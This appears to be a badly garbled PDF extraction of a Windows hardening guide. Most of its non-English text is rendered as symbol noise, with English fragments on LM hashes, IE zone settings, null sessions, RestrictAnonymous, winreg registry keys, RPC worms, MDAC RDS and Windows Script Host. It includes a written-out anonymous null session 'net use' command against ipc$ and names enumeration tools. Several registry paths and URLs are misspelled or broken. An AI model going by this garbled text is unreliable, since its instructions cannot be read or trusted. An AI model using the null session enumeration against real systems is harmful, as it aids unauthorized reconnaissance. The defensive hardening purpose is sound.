Local Security Poclicy
,
#
0,6
$Lanman hashes $,<
E
$Xp ) pqqs "), )
& ? 5 T G' ?
0
password change Lan manager hash network security: Do not store
("c :
2
) Local Policies
6
$l '7
- <
hash LM "
0 '
# 2
#
"
I
M ,6
) T G'Policy Local Security
&
u T5! " U4 0,
O* S
Security Options
("c 0, < +H ) [
$-, < E 7
u -,< " , -
, ,F hashes LM E W L3
P
!&
- 3• :
)
("c
Y7
N 4C
'
$-,< K
6A)
F LM hashes ) 0,< , 6 3 MR/ $,6
Rgistry key
Hive: Hkey_local_Machine
Key:
System\Current ControlSet\Control\LSA\NolMHash
(E
u
3
6 & KSAM ? E
EZP 0 E
E
1[E
E
6A) " hashes
"
P
!
Hash E
EY@
6& ? )@
,
E
E
/# •
0 WE
E
5'
$ P
! & cracking
I
a, 5
4
"
I 2 , a #P< "
P
!
- Y
6& =
a
2
] #P<
F M, 6
- Y ethereal
0_
0-,< ˆK
6 #P< " - Y
#P
< 67
MR/ ) d *
I
, 1' pqqq ) NT4 "), )
b
< ,6 3
% '" - Y
_ C:\Winnt\System32\ Config
F) ?@
Q# ?#
"C
'
SAM % '0,< -,< " , -
?
0 )@
-
56) ), . Controllers Domain C L3
@ 78#
3
I
& Repair
F
) Lock "), )
N % !
, & 9
i: j &') SAM % ' Q
# "
("c
:
l '% '0SAM % ' Q
#
$l '% '0,<
2<
6& " ?
5!] SystemRoot%\System32\Config
C
% !
3
N 4
6
Backup
I
# &'
) -,< ' Backup 7 !89 "
0
a 5 - Y
" 7c
" ?
B5# 7 !89 R3
-
How to Disable LM Authentication on Windows NT
-
How to Enable NTLMv2 Authentication for Windows
95/98/2000/NT
-
New Registry Key to Remove LM Hashes from Active
Directory and Security Account Manager
E
&'( )$,% *
+\
Internet Explorer (IE)
0
' ) #
?@
"), ) ( '784
N ( N ) Patch
5 $,
R4S
@^
h
IE
?
6T
R4 S @ ^
0
T#< ")
85/ ,
6
)
B
.
%
$ 6
K6 *
,6 3
"
5
IE
) ,G
F) "), )
)
K6
6
)
SB
g
" - Y 7 ) X, <
0
)
SL &
!"
2 , ,F ) 2 3@ " 6)
0 < ,6 3
-,6
) IE W
F) IE
<
L3
("c
Windows U )
6
4
F) '
R4 S @ ^
- Y "), )
') #
6 &'(
/ $IE
)
,
F) ?,
5
)
0 <
?@
#
6Patch
SL
Update Windows U )
#
http://windowsupdate.microsoft.com/
?
0
( E
"
) HFNetChk
" ?
,
0 &'( )3 45 678
$, < -,
)
#
Analyzer Microsoft
F Online
)
HS @), , e G
, < T G'
0 5
F) $, 5
C 5! ) SL
,6U )
$U#
0 1 !"
-, < - <
0 < ,6 3
)
#
) - *1 6,
)
6)
Z '?@ ,
+. /
7) Y
)
)Y
?5F
T
@^
6
Y $T G' 6
6% '
R4 S @
IE
$O) 7 Y. a I
.
#
R4S
b
l ' R4 S @ ^
Z F $0
6*
, 63
-, < ( E ? 5F
) MIME \ )
,6(E
0
$IE
)
IE -, < SL
, G 78 5/ ?
$"), ) U '
' &
$ B
.
-,< SL e 'j 4 O)
) -, < S L
" ?
2
$, < -,
6Patch
TG'update
0 5 - Y Baseline Security
Check Qualys Browser a I _O)
0 5 - Y $IE
GX)
P
)
F
&1 @
,<
B
: )c
&'( )$,%
IE
)
Y
- Y
)
2
-,< - <
R 4 S @ & IE 1
)
)-
5
I
#
B
! 0, Z
0, <
0
0, K5 ( N ) Z
W L*
- Y % H)
S @^
‰8
;!
F j< *
- Y 5/5IE *
("c
6patch
?@ $
6Service Pack
+ F Patch 2 3@
0 5 SL
)
("c :
&
N
'X
IE 0
i.
%/
,
?
#4) I
$l '
3
7 # "
%
0, *
P
R4
*#
IE
! 5E
IE
GX) ?
?@
a 5 TP
Inetnet
6%
bP
& O*
•
Custom Level ? 5 T G') Security Tab
& O*
•
4" - Y Z
T G'$
"
n 9 " Options
Tools
("c 2
0,
a <( E
%1
, $IE
"
F) (,! $
$-,< K Service Pack 2 3@
_†pp{pr]
6Patch
("c
0 5 - Y Explore 6 SP1 Internet a h @ " ?
2
6Patch
("c
4$
0
K
9:; 678
F SB
g W L3 2
$j< l ' *
- Y IE6.0 * " #
'
5
%
R4 S @ ^
6*
6 &]
P 785/ Q Zone.
R4 S @ ^
n. $ActiveX Controls ) Scripting Active
6@)7 I
l ' 6%
4"
-
) ?,<
Prompt for Allow paste operations via
& $Scripting j *
•
Clipboard n 9 "
("c
script
TG' g
I
. W L3
5 Active Scripting
0_, 5
- Y $l ' %
N4
- < # 2
4" 6
Download signed Active X Controls
O) "
Prompt
O*
("c] 0 < ( E
" ,G
& O*
$
•
Download unsigned Active X Controls
Initialize and script ActiveX Controls not
Disable
& O*
•
Disable
& O*
•
marked as safe
& $Microsoft j*
•
& $Microsoft VM j*
•
High safety for Java permissions
High safety for Java permissions
N 4) )F
6 B
4 i.
F
I
("c
0
across domains Access to data
0
TG' g Cross-site scripting
6" E
O* $
& $ Miscellaneous j *
P 785/ "
G5
^P
•
I 5 $sources
&'( )$,% * #V '
Windows Remote Access Servies
#P< ^ P
)Y
-, < K
„ 1#
6%
^
6 „ 1 # ) 7 # $"), ) 7) Y
4)7 # "
-,< K
3
6 K
)
:
2
0, 5
,
6V < ? `56
$_PRC] 62 )
E
3 ')
#P
< 6 BH ) 7 #
0 3
"
) 6 '2 <
+
2
F +
GX)
, 5 ,H )
F ? &
&
3)-
3
,
"
) " g@
(, ! ) l '=GX ^
$? &
6 '? &
# l '%
< TP,
" 7,
F
-
)
3"
+
V <S
,
7 L
?5F
b
?@ "
?#
K
%
b
<R V <
) CIFS File
) - "
4_
(E
,
b
?&
)
K6 *
_
-
<
) F
"), )
)
,5
I ] 6h) ) ) 6
/ 6
!
DY/
- Y "
W L3
) P
Q M ,6 l '?
6% '
T
$ #P< V < S
? ,
_
)
#P
<
,
# 4 (, ! % 1
,
B
.
# 4 (,! % 1
, 1
)-
3 7 / pqqw T
"
2,
? &
" - Y
$ #P< V < i.
0, <
S
7 B
5! ( E ?# $l ' 6%# ) 4 0,<
CH ] 0, 5
F 7 # "
% '" - Y Z
-
$,
l '+
System Common Internet )
"
9:; U 2NETBIOS
H #P<
#P< ? &
7 B
5!
"
- 5 6 '$?@
P l '(& # (SMB Block Message Server)]
%# ) 4
(
,G 7 5F
0
(
" - Y
)
6 '&
^P
K6 , 1' ) % 'V < ?# $"), ) % !
-, < <R V <
0
Logon NULL
6i
?A != ]
^P
6
) -
) "), )
4 6 3 $l '
5/ ) K
#P< 6%# ) 4 Q
Anonymous $7 B
F $NETBIOS #P<
) - "
6*
0, 5
0, 5
("c %
4 $ #P
<
E
6@
) 6 , 1' 3
) 6
I]
6 ' #P< ?
)
F +
2 < ) ?, 3 ?#
$ < ( E #P<
-, < <R V <
+
0 ' ,6 3 j6
. " : 7, ,
"
"
3
$ 3 ? #56
<R V <
P
,
)- Y Z
_ 6% '
#4 #
0
:3 )
Logon Anonymouse
Null Session
85! $Session
C
P
!& )( ]
l89 $_ 13Null Session
" 0
6U )
0
- Y
6
)
"), )NT ? G $Local System account
E n 9 " #P<
? G
$bP
7
L
6
A R4
3
:
l'
0, 5
Null Session
H$
H
^P
Local
,K
$ P
1/
6*
0
*
?# $
"
%1
,
1
), 5
5 6 '
KN* 4
Session Null pqqq "), )
2 ) 6'
I5
Z F
u ? # $pqqq "), ) " % P
H 6*
,
_
&
0 !"V $
6
? !
${†"), )CE $NT $pqqq $ME ) XP B B &
) 6N
,
,
# 4 $ &'(
- P< 7 5 I
H
0
)
- Y $? , 6 native
A R 4Null Session )
6
$?
)Z F B
.
0, 5
%#
$ 6-)
Z F computer account Local U )
H ) 6 'pqqq "), ) " % P
H
]
<+
I5
) pqqqLocal System account )
#
3
7 !89 j 5
null Session "), ) 0, 5
6U )
6U )
Computer " $,
bP
P! ?), -,< E
6
6,
F)
I5
)
? @ ) 6 '? 5F
,6 3O *
^
,
<
-,
6" E 0, 5
b
E
!89
E
- Y
"
$ P
75 I
) - "
23 , - 9*5 ) l ' GX) " - Y Z
? 7< RPC Remote Procedure Calls:_
"
] "), )
6*
" , GNT $pqqq $XP (& #
"
9P I nter process
Z F T/
) - " ) N ?&
0
' 7
F ,
3 '
)
3 - *1 ,
0_ B
.
F
\ " 785/ ( E
3
H F
- Y
)
,G 785/ ?
0,<
H F
2
Blaster/Msblast/Lovsan )
6" E - 5 ] 0
Nachi/ Welchia " - Y
0, 5
H $? &
$l ' R 4 S @ : " - Y
) - " ?&
6(
2
" _pqqs $
0, -
- Y l ' R4 S @ : "
Dos
R4 S @ ^
!
^P
$
RPC0
( ). /
0,
0 1 !"
H,, 2 e G
!"
bP
:
R4 S @ d *
7c #< d *
I5
0 5 NAT 7 5B "
5
% 'V < U )
?#
F
?
$l '
&
- .NETBIOS
T L.
&'Afentis security 0,<
A8 " %P
H 7 !89
#B
5! - . "
)@ +5F I 5
6@
2
a
0, 5
$
-,< h PH
NAT ("c
NETBIOS $, L
W L3
:
,G " ? NETBIOS - Y
"
Netbios Auditing Tool (
-,< K ) W L*
^
6*
0 &'( )3 45 678
%K
b
"), )
6
B
/
$
)
#)
" ) (E
- Y $% '
h @ " http:// www. Afentis. Com/resources/win32/nat - Y
0 5
" ,
v2.11 Legion N
${† ) {Š "), ) ?
% 'V <Legion b
" ,
-,< K Rhino9 #P< V <
$pqqq "),
)?
Checker)Security Fridays Share ? ,
) {† ${Š
6*
] "), )CE S @ d *
0,
U)
4 *
GX)
5 - Y
I5 _
SPC)Password
% 'V <
? # $l '
2 3@ ]
I5
0, 5 - Y _
R4Level password share "), ) ?
^P
NT ? @ )
] sp4 $pqqq $_,< -,< SL XP
Baseline Security Advisor S @ ? & W L3
:
R4SMB 0, 5 l '%#
)
0, 5
B
. ? &
"), ) ?
)
? 5 M 9
?
$pqqs )
("c A & R3
)- Y
( ,H $
R4 S @
" - Y Share net , 5 -,6
€" ?
" ,
6
)
( E ) - " ? & NT $pqqq $XP
0
$l '
<+
^P
6'
B5# 7 !89 "
,
pqqs )
1$
b3 n 9 " )
6@
]Net Share/ $
0_ 5 - Y
0
-, < K
' j
$
<+
<+
T 5! )
^P
6( E ],<
7 !89 S
a
‰8
- Y
" 7c
)
7
<
"), )
<+
W 3
<+ …
)% ' ^ P
$
:
u
!89 1 2
6( E " %P
H$
F) 1
)
I 5 0_ < ( E
" ?
u
1/ +
6@C
8
<+
7
?,
("c 2
W L3
L
7
u
u $-,6
$ I - .…
:
" ) - 3•…
3
6" E MR /
P
!&
DY/ ) -,< -
)
6 ,1'XP
"), )
< ,1'
V < ? 5 TG' g - .…
"), )XP
V <
"), )
a
6" E
6*
, N ) 6% '
"
6
- .…NTFS
<+
^P
e 'j 4
6" E
"), )…NT "), ) ) pqqq "), ) $XP S L " % P
H ] SP1 " E
$_
"7 L
Everyone 7 L ) Control Full0, <
"), )…XP ? @ )
SP1 " E
-, < SL Everyone )
$
7 L Read0,<
"), )…xp (
e 'j 4 7 L Sharedocs
<
User s/ Documents and settings/All C: /Documents " E
]
_
Everyone 7 L ) Full Control0,<
d *
H
+
Open Share
"
GX)
I5 +
" ?
"), )
GX)
# 0_, <
I5 $ F
5 ?N
) 25 $?N SMB
6*
5
6
<+
^P
R4 S @ ^
- Y % H
?@
:
d *
3
], <
File Sharing %K
^
Gibson Research Corporation " ?
&
"
6 N 4 SB
g
bP
2
I5
)
R4 S @
0 5
'
j 4
6&
a 5 - Y
…Nessus0 ) - " - Y
I5 -
) -,< ( N $?N j 4 &
a
…Winfingerprint N 4 aWin32 Host/Network Enumeration
E%
!E
"
:
0 &E
'( E)3 4E
5 67E
8 Logon Anonymouse >E
"
I 5 KD) `R Anonymouse Logon
R4 S @
null Session0 K5
TG'$
b3 n 9 " ) "
$
" - Y
From Command Line Prompt:
C:/>net use// ipaddress/ipc$""/user:""
< +P
TL
? G ) -,<anonymouse
P
! & Null
$l '
-, < 'N I
System error 5
F " U4 #
'
F
Ipaddress d *
?@ ( ] user/:”
)_
hidden interprocess communications
E ]
H $l ' R 4 S @ : e G
& @
IPC$
E ;! $l '
P
4 $l '
)-
F) (, ! -, 6,
2 (E
F " U4 #
$
0_
n.
I 5 ("c " E
0 < ,6 *
=GX 2 %
R 4 S @ -, 6,
]% P
Hj *
-, <
'G
Winfingerpirnt d *
6 &'(
6
j 5 .Y
" 0
)
Nessus )
, 63
& _Null Session0 5 - Y $
I5 ?
$0 !E
"V $E
E
$ <-
? !E
E%
!E
"
0 &E
'( E )3 4E
5 67E
8
NT
NTRK)(Resource
( regdump.
K F % ' % <$ ' ) #
n 9"
"), ) ? & NT
h @" ?
E
%
&
b3
]
$ B
3
F
#P< )
6&
K<@
Secutity Analyzer
I 5 A) 2
h @ n 9" ?
l'
>"
Microsoft Baseline
$l '
0
2Q7E
" - Y 0
-
K $
R4 S @ d *
http://www.
Microsoft.
Com/technet/security/tools/Tools/MBSAhom. Asp0 5
&'( ) %
'
9:; 678
DY/ - .NETBIOSa
bP 785/ %
- Y ^
I5 $
6
Patch-cheking , hotfix (
2
-
) pqqq $NT )
0 &'( )3 45 678 RPC ' ) #
!"
:
XP
%
-)8! 0, 5
http://www. Afentis. Com/top20
0 5 - Y & _
% H$
6" E TG' g 7 L
I "), ) ? &
$l ' &
n 9" h
7 , , j6
I5
,G
6 #6 " ?
:
2
a 5
5 ?@ " - Y
) X #
sharing ? 5 T G' g
0,<
CE ) {† ${Š "), ) ? ,
* ? G
User-Level share access control 7
U)
4
L $, <
NT "), ) Dmain "
0,
6% 'V < 0
0
) FTP n 9 "
? # $sharing " - Y
C
'
,6 3
sharing $S
?@
N
n 9 " b' -,< <R V <
&1 P
!& z
0, K5
, 1'
6 , 1'?
? &
7 ) X7
2 , 0, 6 ( E " E ) -,< , K ?
0
#4
sharing ? 5 T G' g
)
HTTP
R4 7
+
$S
? &
,
$
< +P " - Y
I5
Sharing
), . C
'
$7 ) X 7
)(E
,1'
:
0 <R V <
h @
sharing ?# ?
),.
0_,<
("c R 1$
?@ " $
E
<
$
DNS
F) ,
-, < K
u
S X j &' I 5
E
u
a 5 - Y
"
:
:
2
6
!89 $ 1 2
6T 5! " % PHBackup 7
" ?# $7 ) X Restore " ?
] ,E
?# ] 0 5 ip
#
-, < '
0,<
<
F) ? @ _
!89 +
"), )
NT "), )
F ? 5 Restore ) $j
F i
) $ Backup - .
4.0
F ? 5 Restore ) j
) $ Backup - .
F ? 5 Restore ) j
) $ Backup - .
pqqq "), )
) XP "), )
pqqs "), )
"), ) 7
L
, " Null sessions
" #
&
K6
2
NT Domain Controllers $, -, < ,
0
Windows NT Domain
pqqq "), ) " % P
H
6*
,63
3"
7 9P
#4
I5
pqqs|pqqq "), )
?# ]
-,< Z F P
)
1/
b
2#5
I
!89 ?& ?
,<
<
F)
I 2
F Restrict Anonymouse 9
$ pqqq "), )
6
$
•
"
- Y $_ , 5
5
1
) j6
6%
4) 6
#
h
), . T 5!
a 5 - Y
" 7c
"
5 $
,
I5 0
MR /
,6 3 )
7 !89 R3 null session " ?
:
$
! 5E
Anonymouse ?
"), )
- Y ?5F
T@ -, % / - 0,
- Y pqqsRestrict Anonymouse
, $
6 '
7 !89 K
),. T5!
NT
Restrict Anonymouse
"), )
F
,
" - Y
- .
pqqq
F
a 5 - Y
"
, Restrict Anonymouse 2 #< ;!
F
Domain 0
6, B
"), ) ?
%
bP
0,
DY/ - .
6" E )
$Service Pack 3
E
$l ', ,
" ()&17
SL "
u
:
E
u
] ,E
" ?# $7 ) X 7
"
)
7
$
" ?
-,<restore
:
)
E
-,<Backup
("c R1$
0, <
<
2
"), )
I5
/ )NT 4.0
E
0, < 2t5: $
6T5! " %PH
!89 +
3
u( E " %P
H 3
!89 $ 1 2
?@ " $
a 5 - Y
2#5 Trust
pqqq "), )
E
K
I 5 Restrict Anonymouse 1 " ?
, $ K " T#<
E i
NT 4.0 "), )
E ? 5 Resroe ) $j
) $ Backup - .
pqqq "), )
E•? 5 Restore ) j
) $ Backup - .
"
'
F) ? @ _
) XP "), )
E ? 5 Restore ) j
) $ Backup - .
pqqs "), )
n 9"
a K5
E
TP
), . T 5!
E ,B
E
I5
I 5 a #P<
" %/
), .
$ #P<
create the following Registry key
HKEY_LOCAL_MACHINE\SYSTEM\Current controlset\control
Secure PipeServers\winreg
Description:REG_SZ
Value:Registry server
- "
" F)
K 6)
j 4 7 5 I $"), ) SL ? "
0, 5
$l ', B e 'Access Control List
]
,
6)
" %/
$
a K5
)?
d*
3
$l ', B
,<
B
E
),. T5!
E
6" E ) 7 "
, Backup Operators
)
6" E
) Regedit32.exe ]
I5 , B
E
E
F
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Control
Edit
n 9 " Add Key
a "
Enter the following values:
Key Name: Secure PipeServers
Class: REG_SZ
a, B 2 '
F E F
-
H _ pqqq "), )
TP
_ regedit.exe
)
& O*
z
0,6
HKEY_LOCAL_MACHINE\SYSTEM\Current
controlSet\Control\Secure PipeServers
Edit
n 9 " Add Key
& O*
a "
z
Enter the following values:
Key Name: winreg
Class: REG_SZ
a,B 2 '
F E F
HKEY_LPCAL_MACHINE\SYSTEM\Current
ControlSet\Control\SecureServers\winreg
Edit
n 9 " Add Key
& O*
a "
z
Enter the following valuses:
Value Name: Description
Data Type: REG_SZ
String: registry server
a, B 2 '
F E F
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet
\Control\SecurePipeServers\winreg
0 Permissions
" E Z :!
) Security )
B $ winreg O *
I5 " E
)?
6-)
?
1/ 2
0 5 'X
( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor
0, K5
", -
E
"
$-,<
F)
0 5
E
#
1 u ,LH
-,< - < B
/ 2 3@ ?
^P
I
"E ?
)
i
$,<
<
), . T 5! a-,< , K ) - "
6U )
:
"
("c
6" E "
3 i: ?
, B
? @? 5 d*
AllowedPaths
^
]
5 =
Machine
G
2
$
0,<
E
< TP, $
account name U )
1 Z F T/ winreg T5! (,!
,B
),. T5!
P F7 [ ,
Directory Replicator ) service printer Spooler :
? )&'
#
^
I 5 "), ) , # 4
3
6, B
)$
), .
) Users a_
Bypass the access restriction:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\
SecurePipeServers\winreg\Allowedpaths
Value:
Machine
Value
Type:
REG_MULTI_SZ
-
Multi
string
Default
Data:
system\CurrentControlSet\Control\productOptionsSystem\
CurrentControlSet\Control\print\print\printersSystem\CurrentCont
rolSet\
Services\Event logSo ftware\Microsoft\windows NT\Current V
ersionSystem\
Current Contro lSet\Services\Replicator
Valid Range: (A valid path to a location in the registry)
Description: Allow machines access to listed locations in the
Registry provided that no explicit access restrictions exist for that
location.
Value:
Users
Value
type:
REG_MULTI_SZ
Default
-
Multi
string
Data:
Vaild Range:
(A
valid
(none)
path
to
a
location
in
the
registry)
Description:
Allow
users
access
to
listed
locations
in
The registry provided that no explicit access restrictions exist for that
location.
DY/ - .RPC
bP %K %
SL
:
2
A) 2
Windows Update ? 5 TG' g
#B
5!
^ P
Patch b
I
,G
), . T 5!
6MBSA
-, < K
6A)
:
)RPC h @ " - Y
http://www.ntbugtrag.com/dcomrpc.asp ("c 0, < , Y ,
- .
:
),. T5!
#B
5!RPC 2
U4 ) (E
#
?# Patch
B
5!
$
"), ) U )
g
0 5 T 5!
bP
) ? 5 TG' g
"
3 I
B
67
7
)
4
? '
<,
0
F)
2
# 2
" ;! ,
u,
? @ $ #B
5! .
$, <
,<
:
- <
3
2
F)
)
$
4
" ? 59 "
? 5 RPC
^
^
Š{s ) ‹‹Š ) ws{ ) wsŠ
‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8
) "), )
$ R4 S @ :
a 5 - Y
67
"
:
!89 +
E
4 ] "), )TCP
67
4)
_
),. T5! - .
K<@
I
-, < - <Windows remote Access Servivces
" ?
Security Bulletin Service & Hotfix Microsofts
editor windows server 2003 Registry) XP "), ) " - Y - .
access: Remotely accessible registry paths and subpaths
Network
Server 2003 Security Guide windows
&'( )$,% *#5=
Microsoft Data Acces Components
(MDAC)
MDAC
S @^
!89
" - Y
R4 MDAC
?5F
bP
0
" ,
-,< '
) 6, "
$l '785/ 0, 5 - Y _O * 7
a 5 - <
"2
E
B % !)
"
H
# $"), )
:
?
! E % <$
3
2
6*
"
,G
,G 785/ ?
), Z F]
6 # ) " - Y RDS
I ] 5 ,H
6 „1# "
3 M ,6
1
) ,<
<
F
$
R4 S @
,G % c ,
-,< K 7c L.
, ,F %K
F) ) _
overflow buffer - 9 *5
F
5 $
0 ",
RDS 7 5B "
MDAC $ "
S
Remote Data Services 5 , H *
H
) - " ?
0, 5 Z F $
, 7"
$
=GX
) 6" E - 5
78#
) 6=GX 0_
?@
B
F
* ] s) Š MS Access
!89
6
GX) 2 3@
6
T
3" 6
R4 S @ $_
6 ' ,G 7, ,
" j ) -,< 3 < %
5 ,H
R4 S @ B % c " $ 6
0,<
Microsoft jet
" ) j &'
]
I 5 ("c 7 ,
)-
B
. 7 L
=GX - 5 l '=GX Microsoft jet Database
Database Engine "
-, < h PH
6
F) 0
S
: $l '
-,< K )
, # 4 (,!
)- # (N
F
) 6, "
0, -,
!
785/ l '=GX " - Y
3 785/ "
# Buffer Oveflow
?
?5F
(E
%1
, $ :
- 5<
MDAC0,<
P
3]21 MSO3-033 *
_
5
R4 S @ : 2
0
MDAC
-, < - < ?@
$pqqs "), )
' ) #
+. /
"), )
IIS
!"
Q NT
6
)
T)J) $ RDS
) j<
l'
6*
=GX
SQL " MDAC
0, <
6*
] SP2$_
Q$ <
l ' R4 S @ :
!"
‹) q
$,< -,< SL w)Š
) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ )
* SQL Server 7 ? @ )
?@ )
, 56SPI $_
K6
-, < SL , G ) Server 2000
-,6
N 560, 5
- Y
"), )
0 &'( )3 45 678
"), )
)
% ' F) W L3
NT 4.0 - 5 IIS SL
#
)
*
$,< -,< masdcs. Dll” % '] < ( E
("c
C 5! l 'files\Common files\System\msadc\msacds.dll c:\program
h @
#
0_, < 7) Y
) "
,
#4
F
2#5 l 'h @ $
patching 2
( N $,< l '% '% < I
% ! 6
) 5 ,H
7 K
&F "
6 @
6 &'(
F) 7
I5 0 < , 6 3
0
H$
: $
(E ?
HS @),, e G
$-,< - <
("c
3
" ?
(
:
W
(N
W L3 MDAC- 5<
R4 S @ ^
2
("c
( ,H
F b < S
$l '? # 0 5 - Y $
0 5 ,6 3 6 &'(
"
&'( )$,%
%
6=GX
' ) # Windows update
0 5 - Y
L3
:
)(E
0
-,< i
3
I5 &
R4 S @d *
2<
)
-, < SL
6 &'
9:; 678
RDS $Jet " ?
? @
h @http://www.wiretrip.net/rfp/txt/rfp9907.txt &
DY/)
MS03-033
21 " ?
- .?@
R4 S @ : 2 %
_
B ) i.L - . )
' ) #
P
3]2 1 2,
0 5 - Y
:
2
http://support .microsoft. come/support/kb/articles/q184/3/72.asp
http://www.microsoft.com/technet/security/bulletin/ms99-004.asp
http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
http://www.microsoft.com/security_bulletins/ms03-033.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet
/security/bulletin/MS03-033.asp
http://support.microsoft.com/default,aspx?scid= kb;en-us;82378
?
ver
*
$l '
2 3@ 0
=GX
3
$†$p MDAC
Z
I MDAC *
!89
6
F MDAC
bP
!
)
h @ n 9" ?
http://msdn.microsoft.com/library/default.asp?url=download/list/dat
aaccess.asp
" ?
0 5
:
2
0 5
'
) -,6 windows update - Y &
&'( )$,% *#!:1
Scripting Host(WSH Windows)
WSH
)
4 #
)
#B
5! j &' I 5
6*
„ 1 # 0_
-
- 5
6, " - Y
N
4 -,
,
6
#
U
l ' 6%
$"), )
4] , 5
-,<desktop
0_
5/
) K f4 *
F $% '
I ],
„1# $
K "), ) % !VSH ?# $
?@ " g@],
F
-,< K
? G
)
K "), ) 7 B
5! ?
n 9" C
5
,
- 56{† "), )
b
"), )VBScript P 21
) )
) F " $l ' „ 1 # 0,< ?
- 5 IE
') #
Z F
4
6' 4 #
)
-
? 5 ,B )
n 9"
)
4 #
% '
0_ # ) #1
ZF
-,< < VBScrip 0,
b
"
3O * M 6
7
%
% '\
vbs,. Vbe,js, .jse0) 0wsf
6 '$
+. /
)
#
- 56
)
)
WSH K
3
B ;!
I 5 $, ,
& WSH O G
0
) X ! B % !$ ILOVEYOU , ]
J)WSH(
‰ : " U4
6
0_ # ) #1
- 56
4 -,
2 , 0, - 5 - Y
? G $jscript
)
Z F
U)
') #
6" E
n 9"
-,< K
? !
?@ " g@ ] ,
E $% '
b
„1# $
6VBScript 2 1
) )
"), )
,
- 56{† "), )
N
I ],
) l '(
i:
#B
5! j &' I
P IE *
WSH
_
!"
)
-
#
<R ? 1
K6(
F ?# $S
T)J)
) F " $l ' „ 1 # 0, <
„ 1 # 0_
-
5/
) K f4 *
K "), ) % !
$"), )
)
#
6
4
?# $
-
6, " - Y
ZF
J)WSh (
) X ! B % ! $ILOVEYOU ]
-,< < , VBScript 7
b
M ,6
%
I
0, ,
3 c
‰ : ?@ " U 4
3 O * WSH % '\
& "
6
wsf.vbs,.vbe,js,jse
OG
0
6 '$
)
+. /
"), )NT "), )
2 3@
<R ? 1
K6(
F ? # $S
)
i:
-
TJ)
) l '(
_
0,
2 , 0, - 5 - Y
#
? !
Jscript
6" E
0 1 !"
WSH n 9 "
*
B ;!
)
7
$IE )
,
$_, G
f4 *
]
SL {Š ) ME,98,98SE,2000,XP ) WSH,2003
0
'
0
Windows Scrpt
SL e 'j 4 7
h @ " ? Windows Download Script0 5 - Y
!"
0 &'( )3 45 678
-,< SL IE5.5 *
- 56 NT
) {Š "), ) ? @ )
K6
•
0
-,< SL pqqs ) XP $ME ${† "), ) ? @ )
0
WSH
#
W L3
0
$, <P -, < T
("c
("c :
K6
WSH A) " - Y
DY/
I
:
2
?@
K6
' ) SL
0 < ,6 3
)(E
#6
•
)
HS @e G
-,< SL ? @ )
" $,< ,6 3 - < ? @
,G j*
K6
- Y $?@ %
&'( )$,%
$
%
9:; 678
, 7 B
5! ) 6
" - Y , " WSH
0,< , 6 3 F
T#<
3
$l '%
l' 6
D 7# / FWSH
- <
# 2
4 MR/ ) ? 5 TG' g 7
("c ,
)-
„ 1 # WSH ? 59
T G' g
?
) MR / $ 6
bP
%K
)-
) "
,G
) 785/ %
WSH 5 "
)
?@
"), ) % !
?@
DY/
#B
5!
"
I
#
3
3
* $
N ?), )
$
]
40 5
TG' g l '%
4$
0_,<
Noscript.exe b
8
$ WSH
6h8 % '( Wscript.exe
) Cscript.exe
6, BShell\Open2\ Command
E
6
6 ^
-,< K $ Sysmantec U )
#
5
SL
F W L3
I
("c
) Shell/Open/Command $
N 4 $S
0, < , 6 3 ( E $? @
Noscript.exea K5
TP
Y
2 , 0, 5
)
P
Q M , 6 " I'
" Noscript.exe
$ Norton Script Disabler/Enabler
) TG'] WSH
GX) 2 3@
Z F " U 4•
F
6A"
OG
L3
("c
4Desktop
K6% ']
#
wsf0.vbs,vbe,js,jse, $
OG
6% '] -
?# ?
6
-, < ( E
#
$-, < <
N 4)
,
I
j 5
j 5
6% ' ^ P
6% ' "), ) e 'j 4
,
#4)75I
2
.
F
, )
"), ) e 'j 4
6% '
u
3
" ? 59 " U 4 ,
'?
- .0
EXE
u_
) COM ) _
0, < , 6 3 Z F ? @ B '8
("c ? 59
0 5 6 '$" E
F%
#
WSH ( E
) 7 , , ? 5 m .1
FWSH ?,< TG'(,! W L3
#
6
-
6 '?@ ? 5 TG' g
DY/
$ 5 %K
"), ) K F
) / % '?, < T G'" U 4
,6 3 -
_ <
bWSH
a ' !
#B
5! W
•
'
] Noscript
0
.
T G' g
" %/
Symantec
) T G'? # $_TG' g
u
I
?
g
MR/
6
#
% '$
#
$S
2, 0,<
K6
#
0
-, < T
"E
?
0 5 d*
0, 5 •*
T /2 !
) ), . $,
# WSH ?
6
6
! $2
?@
F W L3
("c 5L
S @), ,
G
I 2, 0 < , 6 3
@? !
Z F ?# ? `56$
) / % '( csript.exe
#
0 wscript.exe
)= G
Cscript.exe myscript.vbs
? 5 TG' g
) MR/ - .
:
7 !89 S
WSH
I
h @" ?
http//www.symantec.com/avcenter/venc/data/win.script.hosting.html
0 5 - Y
1c
?!)
-, < ( N U ) )
? 5 TG' g
^P
I
3
$l ' 6 &'(
O *
6% ' I ] 0
6
#
( E
WSH0, 5
b
-, < K
6(
$S
6%
) / K5 X
, <
.scr.vbs,js,jse, wsf,bat,
Script Blocking
4gatways U )
SL $? & ) ? , 6 WSH ?
-)8! ]
("c
@
$
2, _
4" - Y
# ) #1 6
) 6h )
)exe pif
and
8Q _Norton AntiVirus 2001 ? # $, G
C
P
6h) ) %
? & ,
K
DY/
d @ _$!"1^ 77 0
WSH " ?
UW +
?@ *
2 3@ 0
h @Windows Script Download0 5
'Z
7 G', $ 3 ? 1
'
0 1 7V NTFS
6" E " NTFS h
wscript.exe ) jscript.exe
% H
?
i: = G
"
K6-)
)?
I
?
^P
9
- 56account
V <
% ' )
#
% ' )
" 0 5 - Y $"), ) PG
e 'j 4 7 5 I $ <
6% ') 6
Full Control -)
$‰8
W L3
l 'e
) Everyone
$, <
?
?
5 $S
2, 0 <
("c " E
'j 4 7 5 I 0, <
$ 6
0, ,
+
:
uNTFS
6" E
TP
5 % <
'
I
25 0, <
5 S
K6-)
)?
) X
" %/
$
) 6% 'MR / ) T
wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' "
I
<R V <
<R NTFS
e 'j 4 7 5 I $ <
7
6
% ' )
^P
a K5
25 , LH
B' )
O * $My Computer ? 5 TG'•
$
0,<
_% '$
$
u , LH
] -,< O *
0 K5
d*
9
-)
$?, 3] " E
L3 Y.
